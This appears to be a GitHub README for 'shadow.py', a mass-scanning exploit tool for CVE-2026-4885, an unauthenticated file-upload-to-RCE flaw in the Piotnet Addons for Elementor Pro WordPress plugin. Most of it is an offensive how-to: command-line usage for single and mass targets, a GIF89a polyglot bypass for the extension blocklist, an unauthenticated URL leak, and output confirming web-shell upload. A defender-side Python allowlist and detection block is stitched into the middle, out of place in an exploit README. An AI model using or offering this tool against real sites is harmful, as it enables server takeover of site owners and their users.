GitHub: xShadow-Here/CVE-2026-4885

# CVE-2026-4885 Piotnet Addons for Elementor Pro <= 7.1.70 - Unauthenticated Arbitrary File Upload → RCE

### Description :

The **Piotnet Addons for Elementor Pro** plugin for WordPress is vulnerable to arbitrary file upload due to missing file type validation in the `pafe_ajax_form_builder` function in all versions up to, and including, **7.1.70**. The plugin uses an **incomplete extension blacklist** that only blocks the `php`, `phpt`, `php5`, `php7`, and `exe` extensions, while allowing dangerous extensions such as `.phar` or `.phtml` to be uploaded freely. This makes it possible for **unauthenticated attackers** to upload arbitrary PHP files to the affected site's server, leading to **Remote Code Execution (RCE)**.

# INFO :

- [**CVE-2026-4885**](https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/piotnet-addons-for-elementor-pro/piotnet-addons-for-elementor-pro-7170-unauthenticated-arbitrary-file-upload-via-form-file-upload)
- **CVSS Score : 9.8 (Critical)**
- **CVSS Vector : CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H**
- **Affected Versions : <= 7.1.70**
- **Patched : No patch available**
- **Publicly Published : May 18, 2026**
- Researcher : [**Wannes Verwimp**](https://www.wordfence.com/threat-intel/vulnerabilities/researchers/wannes-verwimp)
- PoC by : **Shadow & Friska** 🩷

### Root Cause :

```php
// Incomplete blacklist — only blocks:
$blocked = ['php', 'phpt', 'php5', 'php7', 'exe'];
// .phtml, .phar, .shtml etc. pass through freely ✓
```

The upload path is leakable via the unauthenticated `pafe_export_database` AJAX action → the CSV export contains full file URLs.
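As an added defender-side example (not the plugin's code and not part of this PoC), the following Python mirrors the blocklist check described above next to an allowlist check that rejects the same upload even when GIF89a magic bytes are present, and adds a small hunt over a constructed listing of the plugin's upload directory. The `UPLOAD_ALLOWLIST` and `PHP_EXECUTABLE` sets are assumptions for illustration, not values taken from the plugin.

```python
"""Defender-side checks for the CVE-2026-4885 upload weakness (added example, not the plugin's code)."""
from pathlib import PurePosixPath

# Blocklist the advisory says the plugin uses: only these five extensions are refused.
PLUGIN_BLOCKLIST = {"php", "phpt", "php5", "php7", "exe"}
# Hardened replacement (assumed list): accept only the types a form is expected to receive.
UPLOAD_ALLOWLIST = {"jpg", "jpeg", "png", "gif", "pdf"}
# Extensions commonly mapped to the PHP handler (assumed list); used to hunt the uploads directory.
PHP_EXECUTABLE = {"php", "phtml", "phar", "pht", "phps", "php3", "php4", "php5", "php7", "phpt", "shtml"}
GIF_MAGIC = b"GIF89a"

def extensions(filename: str) -> list[str]:
    """All dot-suffixes, lower-cased: 'shell.php.jpg' -> ['php', 'jpg']."""
    return PurePosixPath(filename).name.lower().split(".")[1:]

def blocklist_accepts(filename: str) -> bool:
    """Mirrors the vulnerable logic: only the final extension is compared against a short blocklist."""
    exts = extensions(filename)
    return bool(exts) and exts[-1] not in PLUGIN_BLOCKLIST

def allowlist_accepts(filename: str, content: bytes) -> bool:
    """Hardened logic: every extension must be allowlisted and the body must match the claimed type.
    A GIF89a prefix on a .phtml file still fails, because the extension check runs first."""
    exts = extensions(filename)
    if not exts or any(e not in UPLOAD_ALLOWLIST for e in exts):
        return False
    if exts[-1] == "gif":
        return content.startswith(GIF_MAGIC)
    return True  # other allowlisted types would get their own magic-byte check here

def suspicious_uploads(listing: list[str]) -> list[str]:
    """Hunt: files with a PHP-executable extension anywhere in the name (catches 'x.php.jpg' too)."""
    return [p for p in listing if PHP_EXECUTABLE & set(extensions(p))]

# Constructed sample listing of the plugin's upload directory (not real data).
SAMPLE_LISTING = [
    "wp-content/uploads/piotnet-addons-for-elementor/photo-1234.jpg",
    "wp-content/uploads/piotnet-addons-for-elementor/shadow-xxx.phtml",
    "wp-content/uploads/piotnet-addons-for-elementor/resume.pdf",
    "wp-content/uploads/piotnet-addons-for-elementor/avatar.php.jpg",
]

if __name__ == "__main__":
    polyglot = GIF_MAGIC + b"<not an image>"  # constructed stand-in for a GIF89a-prefixed upload
    print("blocklist accepts shadow.phtml :", blocklist_accepts("shadow.phtml"))  # True
    print("allowlist accepts shadow.phtml :", allowlist_accepts("shadow.phtml", polyglot))  # False
    print("suspicious uploads :", suspicious_uploads(SAMPLE_LISTING))
```

The same `suspicious_uploads` pass can be run over a real directory walk of `wp-content/uploads/` when checking a site for a prior upload.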
### Usage :

**Interactive menu (default) :**

```
python3 shadow.py
```

```
╾──── MENU ────╼
 1 ▶ one target
 2 ▶ mass scan
 3 ▶ exit
[1/2/3] :
```

**Single target (CLI) :**

```
python3 shadow.py -u https://target.com
python3 shadow.py -u https://target.com -s shell.phtml
```

**Mass targets (CLI) :**

```
python3 shadow.py -f targets.txt -t 20
python3 shadow.py -f targets.txt -t 20 -s shell.phtml
```

**Options :**

```
-u, --url       Target URL
-f, --file      File with target URLs (one per line)
-s, --shell     Custom PHP shell file (GIF89a auto-prepended)
-t, --threads   Concurrent threads for mass mode (default: 5)
-h, --help      Show help
```

### Features :

- 🩷 Fully interactive menu (one target / mass scan)
- ⚡ Async parallel recon — crawls pages concurrently
- 🔍 Auto-discovery of `form_id`, `post_id`, `field_name` from page HTML
- 🪄 GIF89a polyglot magic bytes — bypass image type checks
- 📡 URL leak via `pafe_export_database` (no auth, no nonce)
- 🎯 Shell upload verification (HTTP 200 + PHP execution check)
- 💾 Auto-save results to `shell.txt`
- 🌐 Mass mode with configurable threads + async semaphore
- ⚠️ Blocked extension warning shown before upload prompt

### Shell :

Prepare your shell file locally (e.g. `shadow.phtml`) — GIF89a magic bytes are **auto-prepended** if missing.

### Output :

```
╔══════════════════════════════════════════════════════════╗
║                                                          ║
║   ♡ CVE-2026-4885                                        ║
║   Piotnet Addons for Elementor Pro <= 7.1.70             ║
║   Unauthenticated File Upload → RCE                      ║
║                                                          ║
║   by Shadow & Friska ♡                                   ║
║                                                          ║
╚══════════════════════════════════════════════════════════╝

╾──── VERSION ────╼
♡ v7.1.67 <= 7.1.70 — VULNERABLE

╾──── RECON ────╼
◆ scanning 46 pages (parallel)...
♡ [PIOTNET] https://target.com/contact post_id=9 | form_id=72071c0
◆ using : https://target.com/contact

╾──── EXPLOIT ────╼
◆ post_id=9 | form_id=72071c0 | field=file
▶ trying .phtml ...
♡ uploaded (.phtml)
♡ URL leak : https://target.com/wp-content/uploads/piotnet-addons-for-elementor/shadow-xxx.phtml

╔══════════════════════════════════════════════════════════╗
║   ★ SHELL UPLOADED (.phtml)                              ║
║                                                          ║
║   ◆ shell : https://target.com/wp-content/...            ║
╚══════════════════════════════════════════════════════════╝
```

### Requirements :

```
pip install httpx
```

## Disclaimer :

This tool is for **educational and authorized security testing purposes only**. Unauthorized use against systems you do not own or do not have explicit permission to test is **illegal**. The authors are not responsible for any misuse or damage caused by this tool.